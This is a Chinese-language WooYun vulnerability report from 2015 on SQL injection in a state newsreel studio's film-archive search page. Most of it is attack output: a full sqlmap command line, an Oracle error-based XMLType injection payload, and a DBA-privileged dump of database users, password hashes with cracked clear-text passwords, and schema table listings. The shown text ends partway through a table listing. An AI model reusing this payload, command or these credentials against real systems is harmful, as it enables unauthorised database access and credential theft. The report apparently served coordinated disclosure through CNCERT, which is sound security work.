中央新闻纪录电影制片厂（集团）新影网存在SQL注射漏洞（DBA权限）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0158871

漏洞标题：中央新闻纪录电影制片厂（集团）新影网存在SQL注射漏洞（DBA权限）

漏洞作者：路人甲

提交时间：2015-12-07 17:56

修复时间：2016-01-23 15:16

公开时间：2016-01-23 15:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-07：细节已通知厂商并且等待厂商处理中
2015-12-11：厂商已经确认，细节仅向厂商公开
2015-12-21：细节向核心白帽子及相关领域专家公开
2015-12-31：细节向普通白帽子公开
2016-01-10：细节向实习白帽子公开
2016-01-23：细节向公众公开

简要描述：

新影影视资料部成立于1953年，主要负责收集、整理、保存、利用各个时期的影片资料，所拥有的资料包括：1900年八国联军侵占北京的镜头，孙中山早期革命活动的记录，辛亥革命，北伐战争，抗日战争，延安时期党中央的重大活动，解放战争，新中国诞生，抗美援朝，社会主义建议，全国各民族的历史文化，生活习俗，各条战线著名人士，祖国各地风光物产等；有第一次、第二次世界大战，世界各地风土人情等。
目前，可提供影视资料的计算机快捷查询、胶片放映、磁带选片、各种录像带的转录、光盘刻录、胶转磁、电视高清资料等服务。还可提供影视前期拍摄、后期制作及为出版业提供电影资料图片、编辑书稿的合作。即将开辟媒资管理新途径，为客户提供远程看片、网上购买的便捷服务。作为独家拥有大量历史影片资料的企业，为国内外电视台、电影制作单位提供了许多的资料，为影视界服务历来是我们的责任。

详细说明：

地址：http://**.**.**.**/xinying/chaxun/Select_name.jsp

$ python sqlmap.py -u "http://**.**.**.**/xinying/chaxun/Select_name.jsp" -p tname --technique=E --output-dir=output --form --random-agent --batch --no-cast --current-user --is-dba --users --passwords --count --search -C pass

current user:    'CCTV'
current user is DBA:    True
database management system users [24]:
[*] ANONYMOUS
[*] CCTV
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] QUEST
[*] SCOTT
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
database management system users password hashes:
[*] _NEXT_USER [1]:
    password hash: NULL
[*] ANONYMOUS [1]:
    password hash: anonymous
[*] AQ_ADMINISTRATOR_ROLE [1]:
    password hash: NULL
[*] AQ_USER_ROLE [1]:
    password hash: NULL
[*] AUTHENTICATEDUSER [1]:
    password hash: NULL
[*] CCTV [1]:
    password hash: 657F7A692694CFA0
    clear-text password: CCTV
[*] CONNECT [1]:
    password hash: NULL
[*] CTXAPP [1]:
    password hash: NULL
[*] CTXSYS [1]:
    password hash: 71E687F036AD56E5
    clear-text password: CHANGE_ON_INSTALL
[*] CWM_USER [1]:
    password hash: NULL
[*] DBA [1]:
    password hash: NULL
[*] DBSNMP [1]:
    password hash: 1E509DBFEBF0BBF5
[*] DELETE_CATALOG_ROLE [1]:
    password hash: NULL
[*] DIP [1]:
    password hash: CE4A36B8E06CA59C
    clear-text password: DIP
[*] DMSYS [1]:
    password hash: BFBA5A553FD9E28A
    clear-text password: DMSYS
[*] EJBCLIENT [1]:
    password hash: NULL
[*] EXECUTE_CATALOG_ROLE [1]:
    password hash: NULL
[*] EXFSYS [1]:
    password hash: 66F4EF5650C20355
    clear-text password: EXFSYS
[*] EXP_FULL_DATABASE [1]:
    password hash: NULL
[*] GATHER_SYSTEM_STATISTICS [1]:
    password hash: NULL
[*] GLOBAL_AQ_USER_ROLE [1]:
    password hash: GLOBAL
[*] HS_ADMIN_ROLE [1]:
    password hash: NULL
[*] IMP_FULL_DATABASE [1]:
    password hash: NULL
[*] JAVA_ADMIN [1]:
    password hash: NULL
[*] JAVA_DEPLOY [1]:
    password hash: NULL
[*] JAVADEBUGPRIV [1]:
    password hash: NULL
[*] JAVAIDPRIV [1]:
    password hash: NULL
[*] JAVASYSPRIV [1]:
    password hash: NULL
[*] JAVAUSERPRIV [1]:
    password hash: NULL
[*] LOGSTDBY_ADMINISTRATOR [1]:
    password hash: NULL
[*] MDDATA [1]:
    password hash: DF02A496267DEE66
    clear-text password: MDDATA
[*] MDSYS [1]:
    password hash: 72979A94BAD2AF80
    clear-text password: MDSYS
[*] MGMT_USER [1]:
    password hash: NULL
[*] MGMT_VIEW [1]:
    password hash: 867208234D721FD8
[*] OEM_ADVISOR [1]:
    password hash: NULL
[*] OEM_MONITOR [1]:
    password hash: NULL
[*] OLAP_DBA [1]:
    password hash: NULL
[*] OLAP_USER [1]:
    password hash: NULL
[*] OLAPI_TRACE_USER [1]:
    password hash: NULL
[*] OLAPSYS [1]:
    password hash: invalid
[*] ORACLE_OCM [1]:
    password hash: 6D17CF1EB1611F94
    clear-text password: ORACLE_OCM
[*] ORDPLUGINS [1]:
    password hash: 88A2B2C183431F00
    clear-text password: ORDPLUGINS
[*] ORDSYS [1]:
    password hash: 7EFA02EC7EA6B86F
    clear-text password: ORDSYS
[*] OUTLN [1]:
    password hash: 4A3BA55E08595C81
    clear-text password: OUTLN
[*] PUBLIC [1]:
    password hash: NULL
[*] QUEST [1]:
    password hash: E8A8AF58845EBCF7
    clear-text password: QUEST
[*] RECOVERY_CATALOG_OWNER [1]:
    password hash: NULL
[*] RESOURCE [1]:
    password hash: NULL
[*] SCHEDULER_ADMIN [1]:
    password hash: NULL
[*] SCOTT [1]:
    password hash: F894844C34402B67
    clear-text password: TIGER
[*] SELECT_CATALOG_ROLE [1]:
    password hash: NULL
[*] SI_INFORMTN_SCHEMA [1]:
    password hash: 84B8CBCA4D477FA3
    clear-text password: SI_INFORMTN_SCHEMA
[*] SYS [1]:
    password hash: 5511E44AC561181F
[*] SYSMAN [1]:
    password hash: B35099733B1436C8
[*] SYSTEM [1]:
    password hash: 433796C343EDA358
[*] TSMSYS [1]:
    password hash: 3DF26A8B17D0F29F
    clear-text password: TSMSYS
[*] WM_ADMIN_ROLE [1]:
    password hash: NULL
[*] WMSYS [1]:
    password hash: 7C9BA362F8314299
    clear-text password: WMSYS
[*] XDB [1]:
    password hash: 88D8364765FCE6AF
    clear-text password: CHANGE_ON_INSTALL
[*] XDBADMIN [1]:
    password hash: NULL
[*] XDBWEBSERVICES [1]:
    password hash: NULL

Database: SYS
Table: EXU8USR
[12 entries]
+------------------+
| PASSWD           |
+------------------+
| E8A8AF58845EBCF7 |
| 657F7A692694CFA0 |
| F894844C34402B67 |
| 867208234D721FD8 |
| DF02A496267DEE66 |
| invalid          |
| B35099733B1436C8 |
| anonymous        |
| 3DF26A8B17D0F29F |
| 4A3BA55E08595C81 |
| 433796C343EDA358 |
| 5511E44AC561181F |
+------------------+

漏洞证明：

---
Parameter: tname (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: currPage=0&tname=pOML' AND 4577=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(118)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (4577=4577) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(106)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND 'ZTdz' LIKE 'ZTdz
---
web application technology: Apache, Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
current user:    'CCTV'
current user is DBA:    True
database management system users [24]:
[*] ANONYMOUS
[*] CCTV
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] QUEST
[*] SCOTT
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
database management system users password hashes:
[*] _NEXT_USER [1]:
    password hash: NULL
[*] ANONYMOUS [1]:
    password hash: anonymous
[*] AQ_ADMINISTRATOR_ROLE [1]:
    password hash: NULL
[*] AQ_USER_ROLE [1]:
    password hash: NULL
[*] AUTHENTICATEDUSER [1]:
    password hash: NULL
[*] CCTV [1]:
    password hash: 657F7A692694CFA0
    clear-text password: CCTV
[*] CONNECT [1]:
    password hash: NULL
[*] CTXAPP [1]:
    password hash: NULL
[*] CTXSYS [1]:
    password hash: 71E687F036AD56E5
    clear-text password: CHANGE_ON_INSTALL
[*] CWM_USER [1]:
    password hash: NULL
[*] DBA [1]:
    password hash: NULL
[*] DBSNMP [1]:
    password hash: 1E509DBFEBF0BBF5
[*] DELETE_CATALOG_ROLE [1]:
    password hash: NULL
[*] DIP [1]:
    password hash: CE4A36B8E06CA59C
    clear-text password: DIP
[*] DMSYS [1]:
    password hash: BFBA5A553FD9E28A
    clear-text password: DMSYS
[*] EJBCLIENT [1]:
    password hash: NULL
[*] EXECUTE_CATALOG_ROLE [1]:
    password hash: NULL
[*] EXFSYS [1]:
    password hash: 66F4EF5650C20355
    clear-text password: EXFSYS
[*] EXP_FULL_DATABASE [1]:
    password hash: NULL
[*] GATHER_SYSTEM_STATISTICS [1]:
    password hash: NULL
[*] GLOBAL_AQ_USER_ROLE [1]:
    password hash: GLOBAL
[*] HS_ADMIN_ROLE [1]:
    password hash: NULL
[*] IMP_FULL_DATABASE [1]:
    password hash: NULL
[*] JAVA_ADMIN [1]:
    password hash: NULL
[*] JAVA_DEPLOY [1]:
    password hash: NULL
[*] JAVADEBUGPRIV [1]:
    password hash: NULL
[*] JAVAIDPRIV [1]:
    password hash: NULL
[*] JAVASYSPRIV [1]:
    password hash: NULL
[*] JAVAUSERPRIV [1]:
    password hash: NULL
[*] LOGSTDBY_ADMINISTRATOR [1]:
    password hash: NULL
[*] MDDATA [1]:
    password hash: DF02A496267DEE66
    clear-text password: MDDATA
[*] MDSYS [1]:
    password hash: 72979A94BAD2AF80
    clear-text password: MDSYS
[*] MGMT_USER [1]:
    password hash: NULL
[*] MGMT_VIEW [1]:
    password hash: 867208234D721FD8
[*] OEM_ADVISOR [1]:
    password hash: NULL
[*] OEM_MONITOR [1]:
    password hash: NULL
[*] OLAP_DBA [1]:
    password hash: NULL
[*] OLAP_USER [1]:
    password hash: NULL
[*] OLAPI_TRACE_USER [1]:
    password hash: NULL
[*] OLAPSYS [1]:
    password hash: invalid
[*] ORACLE_OCM [1]:
    password hash: 6D17CF1EB1611F94
    clear-text password: ORACLE_OCM
[*] ORDPLUGINS [1]:
    password hash: 88A2B2C183431F00
    clear-text password: ORDPLUGINS
[*] ORDSYS [1]:
    password hash: 7EFA02EC7EA6B86F
    clear-text password: ORDSYS
[*] OUTLN [1]:
    password hash: 4A3BA55E08595C81
    clear-text password: OUTLN
[*] PUBLIC [1]:
    password hash: NULL
[*] QUEST [1]:
    password hash: E8A8AF58845EBCF7
    clear-text password: QUEST
[*] RECOVERY_CATALOG_OWNER [1]:
    password hash: NULL
[*] RESOURCE [1]:
    password hash: NULL
[*] SCHEDULER_ADMIN [1]:
    password hash: NULL
[*] SCOTT [1]:
    password hash: F894844C34402B67
    clear-text password: TIGER
[*] SELECT_CATALOG_ROLE [1]:
    password hash: NULL
[*] SI_INFORMTN_SCHEMA [1]:
    password hash: 84B8CBCA4D477FA3
    clear-text password: SI_INFORMTN_SCHEMA
[*] SYS [1]:
    password hash: 5511E44AC561181F
[*] SYSMAN [1]:
    password hash: B35099733B1436C8
[*] SYSTEM [1]:
    password hash: 433796C343EDA358
[*] TSMSYS [1]:
    password hash: 3DF26A8B17D0F29F
    clear-text password: TSMSYS
[*] WM_ADMIN_ROLE [1]:
    password hash: NULL
[*] WMSYS [1]:
    password hash: 7C9BA362F8314299
    clear-text password: WMSYS
[*] XDB [1]:
    password hash: 88D8364765FCE6AF
    clear-text password: CHANGE_ON_INSTALL
[*] XDBADMIN [1]:
    password hash: NULL
[*] XDBWEBSERVICES [1]:
    password hash: NULL
Database: SYS
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| ALERT_QT                       | 797979  |
| AQ$_ALERT_QT_H                 | 797979  |
| AQ$_ALERT_QT_I                 | 797979  |
| WRI$_OPTSTAT_HISTGRM_HISTORY   | 355300  |
| SOURCE$                        | 301103  |
| DEPENDENCY$                    | 107850  |
| ARGUMENT$                      | 80263   |
| WRH$_LATCH                     | 79194   |
| WRH$_SYSSTAT                   | 76380   |
| ACCESS$                        | 73780   |
| COL$                           | 56245   |
| WRH$_PARAMETER                 | 53265   |
| OBJ$                           | 51604   |
| WRI$_OPTSTAT_HISTHEAD_HISTORY  | 51507   |
| WRI$_ADV_PARAMETERS            | 39185   |
| HISTGRM$                       | 36658   |
| IDL_UB1$                       | 30194   |
| SETTINGS$                      | 29617   |
| WRH$_WAITCLASSMETRIC_HISTORY   | 26662   |
| OBJAUTH$                       | 24197   |
| WRH$_SYSMETRIC_SUMMARY         | 24165   |
| WRH$_SERVICE_STAT              | 22512   |
| WRH$_LATCH_MISSES_SUMMARY      | 22194   |
| SYN$                           | 20125   |
| WRH$_SYSTEM_EVENT              | 19899   |
| PROCEDUREINFO$                 | 17688   |
| JAVAOBJ$                       | 17222   |
| HIST_HEAD$                     | 16253   |
| WRH$_SQLSTAT                   | 15027   |
| WRH$_SEG_STAT                  | 14553   |
| WRH$_ENQUEUE_STAT              | 12709   |
| PROCEDUREPLSQL$                | 11645   |
| JAVASNM$                       | 11594   |
| WRH$_SQL_PLAN                  | 10839   |
| IDL_SB4$                       | 10783   |
| COM$                           | 10375   |
| WRH$_ROWCACHE_SUMMARY          | 9447    |
| PARAMETER$                     | 9391    |
| IDL_UB2$                       | 7551    |
| ATTRIBUTE$                     | 7275    |
| WRH$_BG_EVENT_SUMMARY          | 6574    |
| CCOL$                          | 6126    |
| METASCRIPTFILTER$              | 6009    |
| CON$                           | 5110    |
| CDEF$                          | 5109    |
| WRI$_OPTSTAT_TAB_HISTORY       | 4937    |
| SEG$                           | 4493    |
| WRH$_SGASTAT                   | 4430    |
| WARNING_SETTINGS$              | 4333    |
| AQ$_ALERT_QT_T                 | 4277    |
| WRI$_OPTSTAT_IND_HISTORY       | 4224    |
| WRH$_DB_CACHE_ADVICE           | 4020    |
| WRH$_SYS_TIME_MODEL            | 3819    |
| VIEW$                          | 3700    |
| ICOL$                          | 3659    |
| WRH$_WAITSTAT                  | 3618    |
| WRH$_STREAMS_POOL_ADVICE       | 3580    |
| IDL_CHAR$                      | 3564    |
| WRH$_SERVICE_WAIT_CLASS        | 3417    |
| METHOD$                        | 3343    |
| METAFILTER$                    | 3314    |
| WRH$_SHARED_POOL_ADVICE        | 3223    |
| WRH$_PGASTAT                   | 2685    |
| WRH$_PGA_TARGET_ADVICE         | 2506    |
| METANAMETRANS$                 | 2499    |
| RESULT$                        | 2450    |
| COL_USAGE$                     | 2377    |
| OID$                           | 2258    |
| IND$                           | 2247    |
| WRH$_OSSTAT                    | 2211    |
| VTABLE$                        | 2208    |
| WRI$_ALERT_HISTORY             | 2200    |
| PROCEDURE$                     | 2179    |
| TYPE_MISC$                     | 2052    |
| WRH$_LIBRARYCACHE              | 1969    |
| TYPE$                          | 1945    |
| COLTYPE$                       | 1717    |
| SCHEDULER$_EVENT_LOG           | 1694    |
| SCHEDULER$_JOB_RUN_DETAILS     | 1640    |
| TAB$                           | 1595    |
| SMON_SCN_TIME                  | 1571    |
| WRH$_PARAMETER_NAME            | 1495    |
| WRH$_SGA_TARGET_ADVICE         | 1432    |
| WRH$_SQL_WORKAREA_HISTOGRAM    | 1432    |
| WRH$_TABLESPACE_SPACE_USAGE    | 1432    |
| WRH$_FILESTATXS                | 1407    |
| WRH$_TABLESPACE_STAT           | 1407    |
| PROCEDUREC$                    | 1406    |
| ATTRCOL$                       | 1272    |
| WRI$_ADV_MESSAGE_GROUPS        | 1099    |
| AW_OBJ$                        | 1089    |
| WRI$_ADV_FINDINGS              | 1085    |
| WRH$_UNDOSTAT                  | 1074    |
| WRH$_RESOURCE_LIMIT            | 895     |
| WRH$_EVENT_NAME                | 889     |
| WRH$_SQL_BIND_METADATA         | 883     |
| HS$_BASE_CAPS                  | 804     |
| WRI$_ADV_TASKS                 | 757     |
| AW$AWMD                        | 728     |
| WRH$_ACTIVE_SESSION_HISTORY    | 719     |
| WRH$_PROCESS_MEMORY_SUMMARY    | 716     |
| WRH$_SGA                       | 716     |
| METAXSLPARAM$                  | 706     |
| SYSAUTH$                       | 701     |
| METASCRIPT$                    | 684     |
| WRH$_SEG_STAT_OBJ              | 671     |
| PROCEDUREJAVA$                 | 650     |
| METAPATHMAP$                   | 608     |
| FIXED_OBJ$                     | 601     |
| PS$                            | 574     |
| COLLECTION$                    | 555     |
| TRIGGERCOL$                    | 552     |
| LOB$                           | 540     |
| WRH$_LOG                       | 537     |
| STATS_TARGET$                  | 457     |
| WRH$_SQLTEXT                   | 434     |
| METAVIEW$                      | 423     |
| WRH$_STAT_NAME                 | 397     |
| WRH$_LATCH_NAME                | 394     |
| WRH$_JAVA_POOL_ADVICE          | 358     |
| WRH$_SESS_TIME_STATS           | 358     |
| WRH$_TEMPSTATXS                | 358     |
| OPARG$                         | 347     |
| WRI$_ADV_DEF_PARAMETERS        | 336     |
| METAXSL$                       | 248     |
| TYPED_VIEW$                    | 248     |
| INDPART$                       | 232     |
| TABPART$                       | 216     |
| WRH$_METRIC_NAME               | 212     |
| STMT_AUDIT_OPTION_MAP          | 205     |
| WRI$_ADV_OBJECTS               | 201     |
| NTAB$                          | 198     |
| WRH$_BUFFER_POOL_STATISTICS    | 179     |
| WRH$_INSTANCE_RECOVERY         | 179     |
| WRH$_RULE_SET                  | 179     |
| WRH$_SQL_SUMMARY               | 179     |
| WRH$_THREAD                    | 179     |
| WRM$_SNAPSHOT                  | 179     |
| MON_MODS$                      | 169     |
| SYSTEM_PRIVILEGE_MAP           | 166     |
| TRIGGER$                       | 164     |
| AUDIT_ACTIONS                  | 160     |
| OPBINDING$                     | 160     |
| LIBRARY$                       | 154     |
| PARTCOL$                       | 152     |
| OLAP_OLEDB_KEYWORDS            | 148     |
| OLAP_OLEDB_FUNCTIONS_PVT       | 147     |
| MON_MODS_ALL$                  | 146     |
| AW$AWXML                       | 145     |
| INDOP$                         | 136     |
| SEQ$                           | 136     |
| KU_NOEXP_TAB                   | 127     |
| PARTOBJ$                       | 107     |
| SUBCOLTYPE$                    | 104     |
| SCHEDULER$_PROGRAM_ARGUMENT    | 103     |
| HS$_BASE_DD                    | 102     |
| TYPEHIERARCHY$                 | 102     |
| AW$EXPRESS                     | 99      |
| XDB_INSTALLATION_TAB           | 94      |
| OLAP_OLEDB_MDPROPVALS          | 93      |
| JAVA$POLICY$                   | 91      |
| OPQTYPE$                       | 87      |
| WRI$_DBU_FEATURE_METADATA      | 86      |
| WRI$_DBU_FEATURE_USAGE         | 86      |
| NOEXP$                         | 82      |
| METASTYLESHEET                 | 80      |
| EXPDEPOBJ$                     | 62      |
| USER$                          | 61      |
| BOOTSTRAP$                     | 57      |
| OPERATOR$                      | 57      |
| OLAP_OLEDB_MDPROPS             | 54      |
| REFCON$                        | 52      |
| AW$AWCREATE                    | 51      |
| WRI$_SEGADV_OBJLIST            | 50      |
| EXPPKGACT$                     | 47      |
| PROFILE$                       | 34      |
| UTL_RECOMP_COMPILED            | 31      |
| OPANCILLARY$                   | 29      |
| PROPS$                         | 28      |
| AW$AWCREATE10G                 | 27      |
| AW$AWREPORT                    | 27      |
| SCHEDULER$_WINDOW_DETAILS      | 27      |
| WRI$_OPTSTAT_OPR               | 27      |
| ICOLDEP$                       | 25      |
| RLS$                           | 24      |
| TABLE_PRIVILEGE_MAP            | 24      |
| EXPDEPACT$                     | 22      |
| WRI$_ALERT_THRESHOLD           | 22      |
| UNDO$                          | 21      |
| JACCELERATOR$DLLS              | 20      |
| EXPPKGOBJ$                     | 19      |
| WRI$_DBU_HIGH_WATER_MARK       | 19      |
| WRI$_DBU_HWM_METADATA          | 19      |
| ASSOCIATION$                   | 18      |
| EXPACT$                        | 17      |
| REGISTRY$                      | 17      |
| TSQ$                           | 17      |
| RESOURCE_MAP                   | 16      |
| AUX_STATS$                     | 13      |
| RULE_SET$                      | 13      |
| AQ$_QUEUE_TABLE_AFFINITIES     | 12      |
| DUC$                           | 12      |
| OPTSTAT_HIST_CONTROL$          | 12      |
| SCHEDULER$_PROGRAM             | 12      |
| RESOURCE_MAPPING_PRIORITY$     | 11      |
| WRH$_OSSTAT_NAME               | 11      |
| CLU$                           | 10      |
| INDTYPES$                      | 10      |
| JAVA$POLICY$SHARED$TABLE       | 10      |
| RESOURCE_COST$                 | 10      |
| TS$                            | 10      |
| RULE_EC$                       | 9       |
| USER_ASTATUS_MAP               | 9       |
| REC_TAB$                       | 8       |
| RULE_SET_NL$                   | 8       |
| SCHEDULER$_JOB                 | 8       |
| WRH$_OPTIMIZER_ENV             | 8       |
| WRI$_ADV_DEFINITIONS           | 8       |
| WRI$_ADV_USAGE                 | 8       |
| FILE$                          | 7       |
| WRH$_DATAFILE                  | 7       |
| WRI$_SCH_VOTES                 | 7       |
| AW$                            | 6       |
| DBMS_LOCK_ALLOCATED            | 6       |
| RESOURCE_PLAN_DIRECTIVE$       | 6       |
| RULE_SET_FOB$                  | 6       |
| SCHEDULER$_GLOBAL_ATTRIBUTE    | 6       |
| SERVICE$                       | 6       |
| WRI$_SEGADV_CNTRLTAB           | 6       |
| AQ$_ALERT_QT_S                 | 5       |
| CONTEXT$                       | 5       |
| DIR$                           | 5       |
| REGISTRY$SCHEMAS               | 5       |
| RESOURCE_CONSUMER_GROUP$       | 5       |
| RULE_SET_IOT$                  | 4       |
| SQL_VERSION$                   | 4       |
| WRH$_SERVICE_NAME              | 4       |
| WRM$_DATABASE_INSTANCE         | 4       |
| AQ$_AQ$_MEM_MC_S               | 3       |
| AQ$_SCHEDULER$_JOBQTAB_S       | 3       |
| AQ$_SYS$SERVICE_METRICS_TAB_S  | 3       |
| ATTRIBUTE_TRANSFORMATIONS$     | 3       |
| REC_VAR$                       | 3       |
| RESOURCE_PLAN$                 | 3       |
| TRANSFORMATIONS$               | 3       |
| CDC_CHANGE_SOURCES$            | 2       |
| PROFNAME$                      | 2       |
| REGISTRY$LOG                   | 2       |
| RESOURCE_GROUP_MAPPING$        | 2       |
| RULE_MAP$                      | 2       |
| RULE_SET_EE$                   | 2       |
| RULE_SET_RDEP$                 | 2       |
| RULE_SET_RE$                   | 2       |
| RULE_SET_ROR$                  | 2       |
| RULE_SET_TE$                   | 2       |
| SCHEDULER$_CLASS               | 2       |
| SCHEDULER$_WINDOW              | 2       |
| SCHEDULER$_WINGRP_MEMBER       | 2       |
| TRIGGERJAVAC$                  | 2       |
| TRIGGERJAVAF$                  | 2       |
| TRIGGERJAVAM$                  | 2       |
| TRIGGERJAVAS$                  | 2       |
| WRH$_TEMPFILE                  | 2       |
| WRI$_DBU_CPU_USAGE_SAMPLE      | 2       |
| "DUAL"                         | 1       |
| AQ$_KUPC$DATAPUMP_QUETAB_S     | 1       |
| AQ$_SCHEDULER$_EVENT_QTAB_S    | 1       |
| AURORA$SHUTDOWN$CLASSES$       | 1       |
| AURORA$STARTUP$CLASSES$        | 1       |
| CDC_CHANGE_SETS$               | 1       |
| CDC_SYSTEM$                    | 1       |
| HS$_FDS_CLASS                  | 1       |
| HS$_FDS_CLASS_DATE             | 1       |
| ID_GENS$                       | 1       |
| INCVID                         | 1       |
| JAVA$JVM$STATUS                | 1       |
| JAVA$PREFS$                    | 1       |
| JOB$                           | 1       |
| KOPM$                          | 1       |
| LOBFRAG$                       | 1       |
| MIGRATE$                       | 1       |
| PARTLOB$                       | 1       |
| RECENT_RESOURCE_INCARNATIONS$  | 1       |
| RECYCLEBIN$                    | 1       |
| REGISTRY$DATABASE              | 1       |
| RULE$                          | 1       |
| RULE_SET_IEUAC$                | 1       |
| SCHEDULER$_SCHEDULE            | 1       |
| SCHEDULER$_WINDOW_GROUP        | 1       |
| TRUSTED_LIST$                  | 1       |
| USTATS$                        | 1       |
| WRI$_ADV_ACTIONS               | 1       |
| WRI$_ADV_REC_ACTIONS           | 1       |
| WRI$_ADV_RECOMMENDATIONS       | 1       |
| WRI$_DBU_CPU_USAGE             | 1       |
| WRI$_DBU_USAGE_SAMPLE          | 1       |
| WRI$_SCH_CONTROL               | 1       |
| WRM$_WR_CONTROL                | 1       |
+--------------------------------+---------+
Database: XDB
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| XDB$H_INDEX                    | 27      |
| XDB$NMSPC_ID                   | 7       |
| XDB$QNAME_ID                   | 7       |
| MIGR9202STATUS                 | 1       |
| XDB$ROOT_INFO                  | 1       |
+--------------------------------+---------+
Database: ORDSYS
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| SI_IMAGE_FORMATS_TAB           | 17      |
| SI_VALUES_TAB                  | 8       |
| SI_FEATURES_TAB                | 4       |
+--------------------------------+---------+
Database: OLAPSYS
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| CWM$CLASSIFICATION             | 41      |
| CWM2$MRALL_DESCRIPTORS         | 41      |
| CWM$DOMAIN                     | 21      |
| CWM$CLASSIFICATIONTYPE         | 15      |
| CWM$OBJECTTYPE                 | 15      |
| CWM$FUNCTION                   | 14      |
| CWM$CLASSIFICATIONENTRY        | 5       |
| CWM$PARAMETER                  | 5       |
| CWM2$AWDIMLOADPARM             | 4       |
| CWM$PROJECT                    | 3       |
| CWM$MODEL                      | 2       |
| CWM2$AWCUBELOADTYPE            | 2       |
| CWM2$AWDIMLOADTYPE             | 2       |
| CWM2$AWCUBELOADPARM            | 1       |
+--------------------------------+---------+
Database: CCTV
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| TAB_FILM_XML                   | 3154    |
| TAB_FILE_TYPE                  | 402     |
+--------------------------------+---------+
Database: SYSTEM
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| HELP                           | 978     |
| LOGSTDBY$SKIP_SUPPORT          | 104     |
| MVIEW$_ADV_PARAMETERS          | 40      |
| REPCAT$_OBJECT_TYPES           | 28      |
| AQ$_QUEUES                     | 23      |
| REPCAT$_RESOLUTION_METHOD      | 19      |
| AQ$_QUEUE_TABLES               | 12      |
| AQ$_INTERNET_AGENTS            | 4       |
| AQ$_INTERNET_AGENT_PRIVS       | 3       |
| REPCAT$_TEMPLATE_STATUS        | 3       |
| REPCAT$_AUDIT_ATTRIBUTE        | 2       |
| REPCAT$_TEMPLATE_TYPES         | 2       |
+--------------------------------+---------+
Database: DBSNMP
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| MGMT_BSLN_METRICS              | 15      |
| MGMT_BASELINE                  | 1       |
| MGMT_RESPONSE_CONFIG           | 1       |
+--------------------------------+---------+
Database: QUEST
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| QUEST_SOO_EVENT_CATEGORIES     | 1365    |
| QUEST_SOO_PARSE_TIME_TRACK     | 1       |
| QUEST_SOO_VERSION              | 1       |
+--------------------------------+---------+
Database: SCOTT
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| EMP                            | 14      |
| SALGRADE                       | 5       |
| DEPT                           | 4       |
+--------------------------------+---------+
Database: EXFSYS
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| RLM$VALIDPRIVS                 | 17      |
| EXF$VALIDIOPER                 | 15      |
| RLM$RULESETSTCODE              | 8       |
| EXF$VALIDPRIVS                 | 3       |
| EXF$PARAMETER                  | 2       |
| EXF$VERSION                    | 1       |
+--------------------------------+---------+
Database: MDSYS
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| SDO_COORD_OP_PARAM_VALS        | 9534    |
| SDO_COORD_REF_SYS              | 4386    |
| SDO_CS_SRS                     | 4386    |
| SDO_COORD_OPS                  | 2245    |
| SDO_COORD_OP_PARAM_USE         | 682     |
| SDO_DATUMS                     | 530     |
| SDO_COORD_OP_PATHS             | 365     |
| SDO_COORD_OP_PARAMS            | 153     |
| SDO_COORD_AXES                 | 139     |
| SDO_UNITS_OF_MEASURE           | 128     |
| SDO_DATUMS_OLD_SNAPSHOT        | 118     |
| MD$RELATE                      | 94      |
| SDO_ELLIPSOIDS                 | 94      |
| SDO_COORD_OP_METHODS           | 83      |
| SDO_STYLES_TABLE               | 78      |
| SDO_COORD_SYS                  | 65      |
| SDO_ELLIPSOIDS_OLD_SNAPSHOT    | 47      |
| SDO_PROJECTIONS_OLD_SNAPSHOT   | 42      |
| SDO_COORD_AXIS_NAMES           | 28      |
| SDO_PRIME_MERIDIANS            | 16      |
| SDO_XML_SCHEMAS                | 3       |
| SDO_GEOR_XMLSCHEMA_TABLE       | 1       |
+--------------------------------+---------+
Database: CTXSYS
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| DR$DBO                         | 303     |
| DR$NUMBER_SEQUENCE             | 256     |
| DR$OBJECT_ATTRIBUTE            | 187     |
| DR$OBJECT_ATTRIBUTE_LOV        | 120     |
| DR$INDEX_VALUE                 | 80      |
| DR$STOPWORD                    | 76      |
| DR$OBJECT                      | 50      |
| DR$PARAMETER                   | 29      |
| DR$PREFERENCE                  | 25      |
| DR$CLASS                       | 12      |
| DR$INDEX_OBJECT                | 9       |
| DR$PREFERENCE_VALUE            | 9       |
| DR$SECTION_GROUP               | 5       |
